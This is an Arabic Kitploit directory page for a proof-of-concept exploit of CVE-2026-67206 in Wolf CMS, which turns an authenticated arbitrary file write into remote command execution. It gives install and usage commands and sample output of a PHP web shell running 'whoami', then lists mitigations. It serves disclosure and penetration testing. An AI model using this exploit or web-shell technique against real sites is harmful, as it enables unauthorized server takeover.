Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-67206 — استغلال PoC لنظام Wolf CMS <= 0.8.3.1: يصادق على حساب Admin، ويكتب ملف PHP تعسفيًا إلى /public عبر FileManagerController، وينفّذ الأوامر من خلال قشرة ويب. | Kitploit
أدوات/GitHubGitHub/anirbala98/cve-2026-67206
الاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

استغلال PoC لنظام Wolf CMS <= 0.8.3.1: يصادق على حساب Admin، ويكتب ملف PHP تعسفيًا إلى /public عبر FileManagerController، وينفّذ الأوامر من خلال قشرة ويب.

عرض المستودع
13منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE عبر كتابة ملفات عشوائية

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة CVE-2026-67206

إخلاء مسؤولية

هذا المشروع مقدم لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.

نظرة عامة

توجد ثغرة كتابة ملفات عشوائية في إصدارات Wolf CMS حتى 0.8.3.1. تسمح للمهاجم المصادق بكتابة ملفات عشوائية خبيثة إلى دليل /public في جذر الويب عبر دالتي create_file() و save() في ملف FileManagerController.php. لا تتحقق دالة create_file() في FileManagerController.php من امتدادات الملفات، مما يسمح للمهاجمين المصادقين بكتابة نصوص PHP خبيثة والحصول على صلاحيات تنفيذ الأكواد عن بُعد.

يمكن العثور على تقرير تفصيلي مع تحليل الكود المصدري وعرض توضيحي للاستغلال على مدونتي على Medium.

الإصدار المتأثر

جميع إصدارات Wolf CMS حتى 0.8.3.1 متأثرة. تمت أرشفة مستودع Wolf CMS اعتبارًا من 28 أغسطس 2021 ولم يعد يُصان بنشاط. لا توجد حاليًا أي تصحيحات لهذه الثغرة.

المتطلبات

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

التثبيت

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

مثال

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

التخفيف

  • التحقق من امتدادات الملفات التي ينشئها المستخدمون المصادقون بناءً على قائمة مسموح بها
  • منع الامتدادات مثل .php و .phtml و .phar و .php5 وما إلى ذلك، إلا إذا كانت ضرورية
  • منع تنفيذ PHP في أدلة الرفع داخل جذر خادم الويب
  • حفظ الملفات المنشأة على خادم مختلف إن أمكن لتقليل الأثر

المراجع

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
تنزيل الأداة